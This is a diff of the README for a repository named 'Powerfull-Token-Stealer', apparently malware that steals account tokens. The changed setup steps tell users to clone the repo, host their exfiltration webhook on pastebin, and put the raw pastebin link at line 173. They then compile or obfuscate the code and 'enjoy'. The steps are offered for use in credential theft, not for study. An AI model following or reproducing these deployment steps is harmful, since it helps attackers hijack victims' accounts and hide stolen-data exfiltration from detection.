KanekiWeb/Powerfull-Token-Stealer/README.md

     ```
 - #### 🖥️ Starting
       1 - Git clone the repo
-      2 - Put your webhook on pastebin
+      2 - Upload your webhook on a pastebin
-      3 - Line 173 Replace "XXXXXXXX" by your pastebin link (with raw)
+      3 - Line 173 Replace `https://pastebin.com/raw/XXXXXXXX` by your pastebin link (with raw)
-      4 - Line 174 Replace by your custom status
       5 - Compile or obfusque your code and enjoy

 ##